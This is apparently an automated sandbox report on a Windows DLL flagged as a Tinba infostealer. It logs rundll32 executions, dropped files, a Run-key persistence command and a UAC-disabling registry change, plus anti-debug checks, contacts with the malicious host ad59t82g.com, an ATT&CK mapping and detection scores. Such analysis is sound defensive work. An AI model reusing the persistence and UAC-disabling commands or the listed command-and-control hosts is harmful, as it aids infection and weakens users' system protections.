Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_array_buffer	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_array	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8stack_trace_get_current	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8context_in_context	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8context_get_entered_context	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8context_get_current_context	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_urlrequest_create	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_uriencode	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_uridecode	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_unregister_internal_web_plugin	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_time_to_timet	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_time_now	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_time_delta	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 0Gs0WEGB1E.dll

Static PE information: More than 146 > 100 exports found

Source: 0Gs0WEGB1E.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: VCRUNTIME140.dll.10.dr
Source:	Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSVCP140.dll.10.dr

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E3436B0 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_6E3436B0

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E343F76 push ecx; ret		0_2_6E343F89
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E33F175 push ecx; ret		0_2_6E33F188

Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Program Files (x86)\mRiZvH\FileSystem_Stdio.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Program Files (x86)\mRiZvH\MSVCP140.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Program Files (x86)\mRiZvH\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Program Files (x86)\mRiZvH\RVQwATT.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WINDOWS			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WINDOWS			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Program Files (x86)\mRiZvH\FileSystem_Stdio.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Program Files (x86)\mRiZvH\MSVCP140.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Program Files (x86)\mRiZvH\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Program Files (x86)\mRiZvH\RVQwATT.exe	Jump to dropped file

Source: C:\Windows\System32\loaddll32.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_0-9904

Source: C:\Windows\System32\loaddll32.exe

API coverage: 1.6 %

Source: C:\Windows\SysWOW64\rundll32.exe TID: 7904

Thread sleep time: -30000s >= -30000s

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: rundll32.exe, 0000000A.00000002.2084091302.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1834552528.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1876290454.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1805751796.000000000324F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1867581832.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1805543370.0000000003248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 0000000A.00000002.2084091302.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1834552528.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1876290454.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1805751796.000000000324F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1867581832.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1805543370.0000000003248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBn
Source: rundll32.exe, 0000000A.00000002.2084091302.000000000320A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWS%

Source: C:\Windows\System32\loaddll32.exe

API call chain: ExitProcess graph end node

graph_0-9906

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E33D8C6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6E33D8C6

Source: C:\Windows\System32\loaddll32.exe

0_2_6E3436B0

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E33D8C6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6E33D8C6
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E33A9D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6E33A9D1

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 104.21.22.88 80

Contains functionality to modify Windows User Account Control (UAC) settings

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: unknown unknown	Jump to behavior

Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2088181293.000000006E348000.00000002.00000001.01000000.00000003.sdmp, 0Gs0WEGB1E.dll	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2088181293.000000006E348000.00000002.00000001.01000000.00000003.sdmp, 0Gs0WEGB1E.dll	Binary or memory string: SHELL_TrayWnd
Source: loaddll32.exe, 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2088181293.000000006E348000.00000002.00000001.01000000.00000003.sdmp, 0Gs0WEGB1E.dll	Binary or memory string: Pragma: no-cacheGETFileSystem_Stdio.dllv4.0.30319%s%s\%sFileSystem_%s%slalala123%text/0SafeMonClassSHELL_TrayWndShell_TrayWnd2.lnkreg.exeadd "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v demo /t REG_SZ /d ""file:///BkShadowWndClassSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SystemEnableLUA1511617181920212223242526272829303132333435363738404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118120121122123124126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160invalid string positionstring too long

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E33B67B GetSystemTimeAsFileTime,__aulldiv,

0_2_6E33B67B

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\loaddll32.exe

Code function: RegSetValue: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SystemEnableLUA

0_2_6E3332BD

Disables UAC (registry)

Source: C:\Windows\SysWOW64\rundll32.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Source: loaddll32.exe

Binary or memory string: 360tray.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	112 Process Injection	2 Disable or Modify Tools	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Access Token Manipulation	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	112 Process Injection	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	2 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Rundll32	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
0Gs0WEGB1E.dll	42%	Virustotal		Browse
0Gs0WEGB1E.dll	55%	ReversingLabs	Win32.Infostealer.Tinba
0Gs0WEGB1E.dll	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\mRiZvH\t4d.tmp	100%	Avira	DR/FakePic.Gen
C:\Program Files (x86)\mRiZvH\MSVCP140.dll	0%	ReversingLabs
C:\Program Files (x86)\mRiZvH\RVQwATT.exe	0%	ReversingLabs
C:\Program Files (x86)\mRiZvH\VCRUNTIME140.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://ad59t82g.com/2/text.bmp	100%	Avira URL Cloud	phishing
http://ad59t82g.com/LL6	100%	Avira URL Cloud	phishing
http://ad59t82g.com/2/t1.bmpC:	100%	Avira URL Cloud	phishing
http://ad59t82g.com/2/text.bmpMd	100%	Avira URL Cloud	phishing
http://ad59t82g.com/2/text.bmpHd	100%	Avira URL Cloud	phishing
http://www.dokee.cn	0%	Avira URL Cloud	safe
http://ad59t82g.com/2/d.bmpbthttp://ad59t82g.com/2/t6.bmphttp://ad59t82g.com/2/text.bmpC:	100%	Avira URL Cloud	phishing
http://ad59t82g.com/13;LY	100%	Avira URL Cloud	phishing
http://www.astrolog.org/astrolog.htm	0%	Avira URL Cloud	safe
http://ad59t82g.com/79	100%	Avira URL Cloud	phishing
http://ad59t82g.com/f1	100%	Avira URL Cloud	phishing
http://ad59t82g.com/	100%	Avira URL Cloud	phishing
http://www.astrolog.org/astrolog.htmMain	0%	Avira URL Cloud	safe
http://ad59t82g.com/79;LY	100%	Avira URL Cloud	phishing
http://www.wosign.com/cps/0	0%	Avira URL Cloud	safe
http://crl.wosign.com/WoSignCodeSigning.crl0G	0%	Avira URL Cloud	safe
http://crt.wosign.com/WoSignCodeSigning.crt0	0%	Avira URL Cloud	safe
http://ad59t82g.com/13LL6	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ad59t82g.com	104.21.22.88	true	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ad59t82g.com/2/text.bmp	rundll32.exe, 0000000A.00000003.1805543370.000000000323F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.astrolog.org/astrolog.htm	rundll32.exe, 0000000A.00000003.1925312583.0000000005547000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2052463388.0000000005409000.00000004.00000020.00020000.00000000.sdmp, FileSystem_Stdio.dll.10.dr	false	Avira URL Cloud: safe	unknown
https://www.geonames.org/Timezone	rundll32.exe, 0000000A.00000003.1925312583.0000000005547000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2052463388.0000000005409000.00000004.00000020.00020000.00000000.sdmp, FileSystem_Stdio.dll.10.dr	false		high
http://ad59t82g.com/13;LY	rundll32.exe, 0000000A.00000003.1876290454.0000000003251000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://ad59t82g.com/2/d.bmpbthttp://ad59t82g.com/2/t6.bmphttp://ad59t82g.com/2/text.bmpC:	rundll32.exe, 0000000A.00000002.2083571808.0000000002DD7000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://ad59t82g.com/LL6	rundll32.exe, 0000000A.00000003.1805751796.000000000324F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1805543370.0000000003248000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.dokee.cn	rundll32.exe, 0000000A.00000003.1887006982.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1887027730.00000000051AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1886966921.00000000051A8000.00000004.00000020.00020000.00000000.sdmp, RVQwATT.exe.10.dr	false	Avira URL Cloud: safe	unknown
http://ad59t82g.com/2/text.bmpMd	rundll32.exe, 0000000A.00000003.1805543370.000000000323F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://ad59t82g.com/2/t1.bmpC:	rundll32.exe, 0000000A.00000002.2083571808.0000000002DD7000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.astro.com/swisseph.	FileSystem_Stdio.dll.10.dr	false		high
http://ad59t82g.com/79	rundll32.exe, 0000000A.00000003.1805751796.000000000324F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1805543370.0000000003248000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://ad59t82g.com/2/text.bmpHd	rundll32.exe, 0000000A.00000003.1805543370.000000000323F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
